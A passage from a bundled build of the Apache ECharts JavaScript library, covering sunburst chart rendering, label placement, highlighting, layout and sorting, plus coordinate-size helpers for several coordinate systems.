childValue[0]);\n\n        sum += childValue;\n    });\n\n    var thisValue = dataNode.value;\n    if (isArray(thisValue)) {\n        thisValue = thisValue[0];\n    }\n\n    if (thisValue == null || isNaN(thisValue)) {\n        thisValue = sum;\n    }\n    // Value should not less than 0.\n    if (thisValue < 0) {\n        thisValue = 0;\n    }\n\n    isArray(dataNode.value)\n        ? (dataNode.value[0] = thisValue)\n        : (dataNode.value = thisValue);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar NodeHighlightPolicy = {\n    NONE: 'none', // not downplay others\n    DESCENDANT: 'descendant',\n    ANCESTOR: 'ancestor',\n    SELF: 'self'\n};\n\nvar DEFAULT_SECTOR_Z = 2;\nvar DEFAULT_TEXT_Z = 4;\n\n/**\n * Sunburstce of Sunburst including Sector, Label, LabelLine\n * @constructor\n * @extends {module:zrender/graphic/Group}\n */\nfunction SunburstPiece(node, seriesModel, ecModel) {\n\n    Group.call(this);\n\n    var sector = new Sector({\n        z2: DEFAULT_SECTOR_Z\n    });\n    sector.seriesIndex = seriesModel.seriesIndex;\n\n    var text = new Text({\n        z2: DEFAULT_TEXT_Z,\n        silent: node.getModel('label').get('silent')\n    });\n    this.add(sector);\n    this.add(text);\n\n    this.updateData(true, node, 'normal', seriesModel, ecModel);\n\n    // Hover to change label and labelLine\n    function onEmphasis() {\n        text.ignore = text.hoverIgnore;\n    }\n    function onNormal() {\n        text.ignore = text.normalIgnore;\n    }\n    this.on('emphasis', onEmphasis)\n        .on('normal', onNormal)\n        .on('mouseover', onEmphasis)\n        .on('mouseout', onNormal);\n}\n\nvar SunburstPieceProto = SunburstPiece.prototype;\n\nSunburstPieceProto.updateData = function (\n    firstCreate,\n    node,\n    state,\n    seriesModel,\n    ecModel\n) {\n    this.node = node;\n    node.piece = this;\n\n    seriesModel = seriesModel || this._seriesModel;\n    ecModel = ecModel || this._ecModel;\n\n    var sector = this.childAt(0);\n    sector.dataIndex = node.dataIndex;\n\n    var itemModel = node.getModel();\n    var layout = node.getLayout();\n    // if (!layout) {\n    //     console.log(node.getLayout());\n    // }\n    var sectorShape = extend({}, layout);\n    sectorShape.label = null;\n\n    var visualColor = getNodeColor(node, seriesModel, ecModel);\n\n    fillDefaultColor(node, seriesModel, visualColor);\n\n    var normalStyle = itemModel.getModel('itemStyle').getItemStyle();\n    var style;\n    if (state === 'normal') {\n        style = normalStyle;\n    }\n    else {\n        var stateStyle = itemModel.getModel(state + '.itemStyle')\n            .getItemStyle();\n        style = merge(stateStyle, normalStyle);\n    }\n    style = defaults(\n        {\n            lineJoin: 'bevel',\n            fill: style.fill || visualColor\n        },\n        style\n    );\n\n    if (firstCreate) {\n        sector.setShape(sectorShape);\n        sector.shape.r = layout.r0;\n        updateProps(\n            sector,\n            {\n                shape: {\n                    r: layout.r\n                }\n            },\n            seriesModel,\n            node.dataIndex\n        );\n        sector.useStyle(style);\n    }\n    else if (typeof style.fill === 'object' && style.fill.type\n        || typeof sector.style.fill === 'object' && sector.style.fill.type\n    ) {\n        // Disable animation for gradient since no interpolation method\n        // is supported for gradient\n        updateProps(sector, {\n            shape: sectorShape\n        }, seriesModel);\n        sector.useStyle(style);\n    }\n    else {\n        updateProps(sector, {\n            shape: sectorShape,\n            style: style\n        }, seriesModel);\n    }\n\n    this._updateLabel(seriesModel, visualColor, state);\n\n    var cursorStyle = itemModel.getShallow('cursor');\n    cursorStyle && sector.attr('cursor', cursorStyle);\n\n    if (firstCreate) {\n        var highlightPolicy = seriesModel.getShallow('highlightPolicy');\n        this._initEvents(sector, node, seriesModel, highlightPolicy);\n    }\n\n    this._seriesModel = seriesModel || this._seriesModel;\n    this._ecModel = ecModel || this._ecModel;\n};\n\nSunburstPieceProto.onEmphasis = function (highlightPolicy) {\n    var that = this;\n    this.node.hostTree.root.eachNode(function (n) {\n        if (n.piece) {\n            if (that.node === n) {\n                n.piece.updateData(false, n, 'emphasis');\n            }\n            else if (isNodeHighlighted(n, that.node, highlightPolicy)) {\n                n.piece.childAt(0).trigger('highlight');\n            }\n            else if (highlightPolicy !== NodeHighlightPolicy.NONE) {\n                n.piece.childAt(0).trigger('downplay');\n            }\n        }\n    });\n};\n\nSunburstPieceProto.onNormal = function () {\n    this.node.hostTree.root.eachNode(function (n) {\n        if (n.piece) {\n            n.piece.updateData(false, n, 'normal');\n        }\n    });\n};\n\nSunburstPieceProto.onHighlight = function () {\n    this.updateData(false, this.node, 'highlight');\n};\n\nSunburstPieceProto.onDownplay = function () {\n    this.updateData(false, this.node, 'downplay');\n};\n\nSunburstPieceProto._updateLabel = function (seriesModel, visualColor, state) {\n    var itemModel = this.node.getModel();\n    var normalModel = itemModel.getModel('label');\n    var labelModel = state === 'normal' || state === 'emphasis'\n        ? normalModel\n        : itemModel.getModel(state + '.label');\n    var labelHoverModel = itemModel.getModel('emphasis.label');\n\n    var text = retrieve(\n        seriesModel.getFormattedLabel(\n            this.node.dataIndex, state, null, null, 'label'\n        ),\n        this.node.name\n    );\n    if (getLabelAttr('show') === false) {\n        text = '';\n    }\n\n    var layout = this.node.getLayout();\n    var labelMinAngle = labelModel.get('minAngle');\n    if (labelMinAngle == null) {\n        labelMinAngle = normalModel.get('minAngle');\n    }\n    labelMinAngle = labelMinAngle / 180 * Math.PI;\n    var angle = layout.endAngle - layout.startAngle;\n    if (labelMinAngle != null && Math.abs(angle) < labelMinAngle) {\n        // Not displaying text when angle is too small\n        text = '';\n    }\n\n    var label = this.childAt(1);\n\n    setLabelStyle(\n        label.style, label.hoverStyle || {}, normalModel, labelHoverModel,\n        {\n            defaultText: labelModel.getShallow('show') ? text : null,\n            autoColor: visualColor,\n            useInsideStyle: true\n        }\n    );\n\n    var midAngle = (layout.startAngle + layout.endAngle) / 2;\n    var dx = Math.cos(midAngle);\n    var dy = Math.sin(midAngle);\n\n    var r;\n    var labelPosition = getLabelAttr('position');\n    var labelPadding = getLabelAttr('distance') || 0;\n    var textAlign = getLabelAttr('align');\n    if (labelPosition === 'outside') {\n        r = layout.r + labelPadding;\n        textAlign = midAngle > Math.PI / 2 ? 'right' : 'left';\n    }\n    else {\n        if (!textAlign || textAlign === 'center') {\n            r = (layout.r + layout.r0) / 2;\n            textAlign = 'center';\n        }\n        else if (textAlign === 'left') {\n            r = layout.r0 + labelPadding;\n            if (midAngle > Math.PI / 2) {\n                textAlign = 'right';\n            }\n        }\n        else if (textAlign === 'right') {\n            r = layout.r - labelPadding;\n            if (midAngle > Math.PI / 2) {\n                textAlign = 'left';\n            }\n        }\n    }\n\n    label.attr('style', {\n        text: text,\n        textAlign: textAlign,\n        textVerticalAlign: getLabelAttr('verticalAlign') || 'middle',\n        opacity: getLabelAttr('opacity')\n    });\n\n    var textX = r * dx + layout.cx;\n    var textY = r * dy + layout.cy;\n    label.attr('position', [textX, textY]);\n\n    var rotateType = getLabelAttr('rotate');\n    var rotate = 0;\n    if (rotateType === 'radial') {\n        rotate = -midAngle;\n        if (rotate < -Math.PI / 2) {\n            rotate += Math.PI;\n        }\n    }\n    else if (rotateType === 'tangential') {\n        rotate = Math.PI / 2 - midAngle;\n        if (rotate > Math.PI / 2) {\n            rotate -= Math.PI;\n        }\n        else if (rotate < -Math.PI / 2) {\n            rotate += Math.PI;\n        }\n    }\n    else if (typeof rotateType === 'number') {\n        rotate = rotateType * Math.PI / 180;\n    }\n    label.attr('rotation', rotate);\n\n    function getLabelAttr(name) {\n        var stateAttr = labelModel.get(name);\n        if (stateAttr == null) {\n            return normalModel.get(name);\n        }\n        else {\n            return stateAttr;\n        }\n    }\n};\n\nSunburstPieceProto._initEvents = function (\n    sector,\n    node,\n    seriesModel,\n    highlightPolicy\n) {\n    sector.off('mouseover').off('mouseout').off('emphasis').off('normal');\n\n    var that = this;\n    var onEmphasis = function () {\n        that.onEmphasis(highlightPolicy);\n    };\n    var onNormal = function () {\n        that.onNormal();\n    };\n    var onDownplay = function () {\n        that.onDownplay();\n    };\n    var onHighlight = function () {\n        that.onHighlight();\n    };\n\n    if (seriesModel.isAnimationEnabled()) {\n        sector\n            .on('mouseover', onEmphasis)\n            .on('mouseout', onNormal)\n            .on('emphasis', onEmphasis)\n            .on('normal', onNormal)\n            .on('downplay', onDownplay)\n            .on('highlight', onHighlight);\n    }\n};\n\ninherits(SunburstPiece, Group);\n\n/**\n * Get node color\n *\n * @param {TreeNode} node the node to get color\n * @param {module:echarts/model/Series} seriesModel series\n * @param {module:echarts/model/Global} ecModel echarts defaults\n */\nfunction getNodeColor(node, seriesModel, ecModel) {\n    // Color from visualMap\n    var visualColor = node.getVisual('color');\n    var visualMetaList = node.getVisual('visualMeta');\n    if (!visualMetaList || visualMetaList.length === 0) {\n        // Use first-generation color if has no visualMap\n        visualColor = null;\n    }\n\n    // Self color or level color\n    var color = node.getModel('itemStyle').get('color');\n    if (color) {\n        return color;\n    }\n    else if (visualColor) {\n        // Color mapping\n        return visualColor;\n    }\n    else if (node.depth === 0) {\n        // Virtual root node\n        return ecModel.option.color[0];\n    }\n    else {\n        // First-generation color\n        var length = ecModel.option.color.length;\n        color = ecModel.option.color[getRootId(node) % length];\n    }\n    return color;\n}\n\n/**\n * Get index of root in sorted order\n *\n * @param {TreeNode} node current node\n * @return {number} index in root\n */\nfunction getRootId(node) {\n    var ancestor = node;\n    while (ancestor.depth > 1) {\n        ancestor = ancestor.parentNode;\n    }\n\n    var virtualRoot = node.getAncestors()[0];\n    return indexOf(virtualRoot.children, ancestor);\n}\n\nfunction isNodeHighlighted(node, activeNode, policy) {\n    if (policy === NodeHighlightPolicy.NONE) {\n        return false;\n    }\n    else if (policy === NodeHighlightPolicy.SELF) {\n        return node === activeNode;\n    }\n    else if (policy === NodeHighlightPolicy.ANCESTOR) {\n        return node === activeNode || node.isAncestorOf(activeNode);\n    }\n    else {\n        return node === activeNode || node.isDescendantOf(activeNode);\n    }\n}\n\n// Fix tooltip callback function params.color incorrect when pick a default color\nfunction fillDefaultColor(node, seriesModel, color) {\n    var data = seriesModel.getData();\n    data.setItemVisual(node.dataIndex, 'color', color);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar ROOT_TO_NODE_ACTION = 'sunburstRootToNode';\n\nvar SunburstView = Chart.extend({\n\n    type: 'sunburst',\n\n    init: function () {\n    },\n\n    render: function (seriesModel, ecModel, api, payload) {\n        var that = this;\n\n        this.seriesModel = seriesModel;\n        this.api = api;\n        this.ecModel = ecModel;\n\n        var data = seriesModel.getData();\n        var virtualRoot = data.tree.root;\n\n        var newRoot = seriesModel.getViewRoot();\n\n        var group = this.group;\n\n        var renderLabelForZeroData = seriesModel.get('renderLabelForZeroData');\n\n        var newChildren = [];\n        newRoot.eachNode(function (node) {\n            newChildren.push(node);\n        });\n        var oldChildren = this._oldChildren || [];\n\n        dualTravel(newChildren, oldChildren);\n\n        renderRollUp(virtualRoot, newRoot);\n\n        if (payload && payload.highlight && payload.highlight.piece) {\n            var highlightPolicy = seriesModel.getShallow('highlightPolicy');\n            payload.highlight.piece.onEmphasis(highlightPolicy);\n        }\n        else if (payload && payload.unhighlight) {\n            var piece = this.virtualPiece;\n            if (!piece && virtualRoot.children.length) {\n                piece = virtualRoot.children[0].piece;\n            }\n            if (piece) {\n                piece.onNormal();\n            }\n        }\n\n        this._initEvents();\n\n        this._oldChildren = newChildren;\n\n        function dualTravel(newChildren, oldChildren) {\n            if (newChildren.length === 0 && oldChildren.length === 0) {\n                return;\n            }\n\n            new DataDiffer(oldChildren, newChildren, getKey, getKey)\n                .add(processNode)\n                .update(processNode)\n                .remove(curry(processNode, null))\n                .execute();\n\n            function getKey(node) {\n                return node.getId();\n            }\n\n            function processNode(newId, oldId) {\n                var newNode = newId == null ? null : newChildren[newId];\n                var oldNode = oldId == null ? null : oldChildren[oldId];\n\n                doRenderNode(newNode, oldNode);\n            }\n        }\n\n        function doRenderNode(newNode, oldNode) {\n            if (!renderLabelForZeroData && newNode && !newNode.getValue()) {\n                // Not render data with value 0\n                newNode = null;\n            }\n\n            if (newNode !== virtualRoot && oldNode !== virtualRoot) {\n                if (oldNode && oldNode.piece) {\n                    if (newNode) {\n                        // Update\n                        oldNode.piece.updateData(\n                            false, newNode, 'normal', seriesModel, ecModel);\n\n                        // For tooltip\n                        data.setItemGraphicEl(newNode.dataIndex, oldNode.piece);\n                    }\n                    else {\n                        // Remove\n                        removeNode(oldNode);\n                    }\n                }\n                else if (newNode) {\n                    // Add\n                    var piece = new SunburstPiece(\n                        newNode,\n                        seriesModel,\n                        ecModel\n                    );\n                    group.add(piece);\n\n                    // For tooltip\n                    data.setItemGraphicEl(newNode.dataIndex, piece);\n                }\n            }\n        }\n\n        function removeNode(node) {\n            if (!node) {\n                return;\n            }\n\n            if (node.piece) {\n                group.remove(node.piece);\n                node.piece = null;\n            }\n        }\n\n        function renderRollUp(virtualRoot, viewRoot) {\n            if (viewRoot.depth > 0) {\n                // Render\n                if (that.virtualPiece) {\n                    // Update\n                    that.virtualPiece.updateData(\n                        false, virtualRoot, 'normal', seriesModel, ecModel);\n                }\n                else {\n                    // Add\n                    that.virtualPiece = new SunburstPiece(\n                        virtualRoot,\n                        seriesModel,\n                        ecModel\n                    );\n                    group.add(that.virtualPiece);\n                }\n\n                if (viewRoot.piece._onclickEvent) {\n                    viewRoot.piece.off('click', viewRoot.piece._onclickEvent);\n                }\n                var event = function (e) {\n                    that._rootToNode(viewRoot.parentNode);\n                };\n                viewRoot.piece._onclickEvent = event;\n                that.virtualPiece.on('click', event);\n            }\n            else if (that.virtualPiece) {\n                // Remove\n                group.remove(that.virtualPiece);\n                that.virtualPiece = null;\n            }\n        }\n    },\n\n    dispose: function () {\n    },\n\n    /**\n     * @private\n     */\n    _initEvents: function () {\n        var that = this;\n\n        var event = function (e) {\n            var targetFound = false;\n            var viewRoot = that.seriesModel.getViewRoot();\n            viewRoot.eachNode(function (node) {\n                if (!targetFound\n                    && node.piece && node.piece.childAt(0) === e.target\n                ) {\n                    var nodeClick = node.getModel().get('nodeClick');\n                    if (nodeClick === 'rootToNode') {\n                        that._rootToNode(node);\n                    }\n                    else if (nodeClick === 'link') {\n                        var itemModel = node.getModel();\n                        var link = itemModel.get('link');\n                        if (link) {\n                            var linkTarget = itemModel.get('target', true)\n                                || '_blank';\n                            window.open(link, linkTarget);\n                        }\n                    }\n                    targetFound = true;\n                }\n            });\n        };\n\n        if (this.group._onclickEvent) {\n            this.group.off('click', this.group._onclickEvent);\n        }\n        this.group.on('click', event);\n        this.group._onclickEvent = event;\n    },\n\n    /**\n     * @private\n     */\n    _rootToNode: function (node) {\n        if (node !== this.seriesModel.getViewRoot()) {\n            this.api.dispatchAction({\n                type: ROOT_TO_NODE_ACTION,\n                from: this.uid,\n                seriesId: this.seriesModel.id,\n                targetNode: node\n            });\n        }\n    },\n\n    /**\n     * @implement\n     */\n    containPoint: function (point, seriesModel) {\n        var treeRoot = seriesModel.getData();\n        var itemLayout = treeRoot.getItemLayout(0);\n        if (itemLayout) {\n            var dx = point[0] - itemLayout.cx;\n            var dy = point[1] - itemLayout.cy;\n            var radius = Math.sqrt(dx * dx + dy * dy);\n            return radius <= itemLayout.r && radius >= itemLayout.r0;\n        }\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @file Sunburst action\n */\n\nvar ROOT_TO_NODE_ACTION$1 = 'sunburstRootToNode';\n\nregisterAction(\n    {type: ROOT_TO_NODE_ACTION$1, update: 'updateView'},\n    function (payload, ecModel) {\n\n        ecModel.eachComponent(\n            {mainType: 'series', subType: 'sunburst', query: payload},\n            handleRootToNode\n        );\n\n        function handleRootToNode(model, index) {\n            var targetInfo = retrieveTargetInfo(payload, [ROOT_TO_NODE_ACTION$1], model);\n\n            if (targetInfo) {\n                var originViewRoot = model.getViewRoot();\n                if (originViewRoot) {\n                    payload.direction = aboveViewRoot(originViewRoot, targetInfo.node)\n                        ? 'rollUp' : 'drillDown';\n                }\n                model.resetViewRoot(targetInfo.node);\n            }\n        }\n    }\n);\n\n\nvar HIGHLIGHT_ACTION = 'sunburstHighlight';\n\nregisterAction(\n    {type: HIGHLIGHT_ACTION, update: 'updateView'},\n    function (payload, ecModel) {\n\n        ecModel.eachComponent(\n            {mainType: 'series', subType: 'sunburst', query: payload},\n            handleHighlight\n        );\n\n        function handleHighlight(model, index) {\n            var targetInfo = retrieveTargetInfo(payload, [HIGHLIGHT_ACTION], model);\n\n            if (targetInfo) {\n                payload.highlight = targetInfo.node;\n            }\n        }\n    }\n);\n\n\nvar UNHIGHLIGHT_ACTION = 'sunburstUnhighlight';\n\nregisterAction(\n    {type: UNHIGHLIGHT_ACTION, update: 'updateView'},\n    function (payload, ecModel) {\n\n        ecModel.eachComponent(\n            {mainType: 'series', subType: 'sunburst', query: payload},\n            handleUnhighlight\n        );\n\n        function handleUnhighlight(model, index) {\n            payload.unhighlight = true;\n        }\n    }\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\n// var PI2 = Math.PI * 2;\nvar RADIAN$2 = Math.PI / 180;\n\nvar sunburstLayout = function (seriesType, ecModel, api, payload) {\n    ecModel.eachSeriesByType(seriesType, function (seriesModel) {\n        var center = seriesModel.get('center');\n        var radius = seriesModel.get('radius');\n\n        if (!isArray(radius)) {\n            radius = [0, radius];\n        }\n        if (!isArray(center)) {\n            center = [center, center];\n        }\n\n        var width = api.getWidth();\n        var height = api.getHeight();\n        var size = Math.min(width, height);\n        var cx = parsePercent$1(center[0], width);\n        var cy = parsePercent$1(center[1], height);\n        var r0 = parsePercent$1(radius[0], size / 2);\n        var r = parsePercent$1(radius[1], size / 2);\n\n        var startAngle = -seriesModel.get('startAngle') * RADIAN$2;\n        var minAngle = seriesModel.get('minAngle') * RADIAN$2;\n\n        var virtualRoot = seriesModel.getData().tree.root;\n        var treeRoot = seriesModel.getViewRoot();\n        var rootDepth = treeRoot.depth;\n\n        var sort = seriesModel.get('sort');\n        if (sort != null) {\n            initChildren$1(treeRoot, sort);\n        }\n\n        var validDataCount = 0;\n        each$1(treeRoot.children, function (child) {\n            !isNaN(child.getValue()) && validDataCount++;\n        });\n\n        var sum = treeRoot.getValue();\n        // Sum may be 0\n        var unitRadian = Math.PI / (sum || validDataCount) * 2;\n\n        var renderRollupNode = treeRoot.depth > 0;\n        var levels = treeRoot.height - (renderRollupNode ? -1 : 1);\n        var rPerLevel = (r - r0) / (levels || 1);\n\n        var clockwise = seriesModel.get('clockwise');\n\n        var stillShowZeroSum = seriesModel.get('stillShowZeroSum');\n\n        // In the case some sector angle is smaller than minAngle\n        // var restAngle = PI2;\n        // var valueSumLargerThanMinAngle = 0;\n\n        var dir = clockwise ? 1 : -1;\n\n        /**\n         * Render a tree\n         * @return increased angle\n         */\n        var renderNode = function (node, startAngle) {\n            if (!node) {\n                return;\n            }\n\n            var endAngle = startAngle;\n\n            // Render self\n            if (node !== virtualRoot) {\n                // Tree node is virtual, so it doesn't need to be drawn\n                var value = node.getValue();\n\n                var angle = (sum === 0 && stillShowZeroSum)\n                    ? unitRadian : (value * unitRadian);\n                if (angle < minAngle) {\n                    angle = minAngle;\n                    // restAngle -= minAngle;\n                }\n                // else {\n                //     valueSumLargerThanMinAngle += value;\n                // }\n\n                endAngle = startAngle + dir * angle;\n\n                var depth = node.depth - rootDepth\n                    - (renderRollupNode ? -1 : 1);\n                var rStart = r0 + rPerLevel * depth;\n                var rEnd = r0 + rPerLevel * (depth + 1);\n\n                var itemModel = node.getModel();\n                if (itemModel.get('r0') != null) {\n                    rStart = parsePercent$1(itemModel.get('r0'), size / 2);\n                }\n                if (itemModel.get('r') != null) {\n                    rEnd = parsePercent$1(itemModel.get('r'), size / 2);\n                }\n\n                node.setLayout({\n                    angle: angle,\n                    startAngle: startAngle,\n                    endAngle: endAngle,\n                    clockwise: clockwise,\n                    cx: cx,\n                    cy: cy,\n                    r0: rStart,\n                    r: rEnd\n                });\n            }\n\n            // Render children\n            if (node.children && node.children.length) {\n                // currentAngle = startAngle;\n                var siblingAngle = 0;\n                each$1(node.children, function (node) {\n                    siblingAngle += renderNode(node, startAngle + siblingAngle);\n                });\n            }\n\n            return endAngle - startAngle;\n        };\n\n        // Virtual root node for roll up\n        if (renderRollupNode) {\n            var rStart = r0;\n            var rEnd = r0 + rPerLevel;\n\n            var angle = Math.PI * 2;\n            virtualRoot.setLayout({\n                angle: angle,\n                startAngle: startAngle,\n                endAngle: startAngle + angle,\n                clockwise: clockwise,\n                cx: cx,\n                cy: cy,\n                r0: rStart,\n                r: rEnd\n            });\n        }\n\n        renderNode(treeRoot, startAngle);\n    });\n};\n\n/**\n * Init node children by order and update visual\n *\n * @param {TreeNode} node  root node\n * @param {boolean}  isAsc if is in ascendant order\n */\nfunction initChildren$1(node, isAsc) {\n    var children = node.children || [];\n\n    node.children = sort$2(children, isAsc);\n\n    // Init children recursively\n    if (children.length) {\n        each$1(node.children, function (child) {\n            initChildren$1(child, isAsc);\n        });\n    }\n}\n\n/**\n * Sort children nodes\n *\n * @param {TreeNode[]}               children children of node to be sorted\n * @param {string | function | null} sort sort method\n *                                   See SunburstSeries.js for details.\n */\nfunction sort$2(children, sortOrder) {\n    if (typeof sortOrder === 'function') {\n        return children.sort(sortOrder);\n    }\n    else {\n        var isAsc = sortOrder === 'asc';\n        return children.sort(function (a, b) {\n            var diff = (a.getValue() - b.getValue()) * (isAsc ? 1 : -1);\n            return diff === 0\n                ? (a.dataIndex - b.dataIndex) * (isAsc ? -1 : 1)\n                : diff;\n        });\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterVisual(curry(dataColor, 'sunburst'));\nregisterLayout(curry(sunburstLayout, 'sunburst'));\nregisterProcessor(curry(dataFilter, 'sunburst'));\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction dataToCoordSize(dataSize, dataItem) {\n    // dataItem is necessary in log axis.\n    dataItem = dataItem || [0, 0];\n    return map(['x', 'y'], function (dim, dimIdx) {\n        var axis = this.getAxis(dim);\n        var val = dataItem[dimIdx];\n        var halfSize = dataSize[dimIdx] / 2;\n        return axis.type === 'category'\n            ? axis.getBandWidth()\n            : Math.abs(axis.dataToCoord(val - halfSize) - axis.dataToCoord(val + halfSize));\n    }, this);\n}\n\nvar prepareCartesian2d = function (coordSys) {\n    var rect = coordSys.grid.getRect();\n    return {\n        coordSys: {\n            // The name exposed to user is always 'cartesian2d' but not 'grid'.\n            type: 'cartesian2d',\n            x: rect.x,\n            y: rect.y,\n            width: rect.width,\n            height: rect.height\n        },\n        api: {\n            coord: function (data) {\n                // do not provide \"out\" param\n                return coordSys.dataToPoint(data);\n            },\n            size: bind(dataToCoordSize, coordSys)\n        }\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction dataToCoordSize$1(dataSize, dataItem) {\n    dataItem = dataItem || [0, 0];\n    return map([0, 1], function (dimIdx) {\n        var val = dataItem[dimIdx];\n        var halfSize = dataSize[dimIdx] / 2;\n        var p1 = [];\n        var p2 = [];\n        p1[dimIdx] = val - halfSize;\n        p2[dimIdx] = val + halfSize;\n        p1[1 - dimIdx] = p2[1 - dimIdx] = dataItem[1 - dimIdx];\n        return Math.abs(this.dataToPoint(p1)[dimIdx] - this.dataToPoint(p2)[dimIdx]);\n    }, this);\n}\n\nvar prepareGeo = function (coordSys) {\n    var rect = coordSys.getBoundingRect();\n    return {\n        coordSys: {\n            type: 'geo',\n            x: rect.x,\n            y: rect.y,\n            width: rect.width,\n            height: rect.height,\n            zoom: coordSys.getZoom()\n        },\n        api: {\n            coord: function (data) {\n                // do not provide \"out\" and noRoam param,\n                // Compatible with this usage:\n                // echarts.util.map(item.points, api.coord)\n                return coordSys.dataToPoint(data);\n            },\n            size: bind(dataToCoordSize$1, coordSys)\n        }\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction dataToCoordSize$2(dataSize, dataItem) {\n    // dataItem is necessary in log axis.\n    var axis = this.getAxis();\n    var val = dataItem instanceof Array ? dataItem[0] : dataItem;\n    var halfSize = (dataSize instanceof Array ? dataSize[0] : dataSize) / 2;\n    return axis.type === 'category'\n        ? axis.getBandWidth()\n        : Math.abs(axis.dataToCoord(val - halfSize) - axis.dataToCoord(val + halfSize));\n}\n\nvar prepareSingleAxis = function (coordSys) {\n    var rect = coordSys.getRect();\n\n    return {\n        coordSys: {\n            type: 'singleAxis',\n            x: rect.x,\n            y: rect.y,\n            width: rect.width,\n            height: rect.height\n        },\n        api: {\n            coord: function (val) {\n                // do not provide \"out\" param\n                return coordSys.dataToPoint(val);\n            },\n            size: bind(dataToCoordSize$2, coordSys)\n        }\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction dataToCoordSize$3(dataSize, 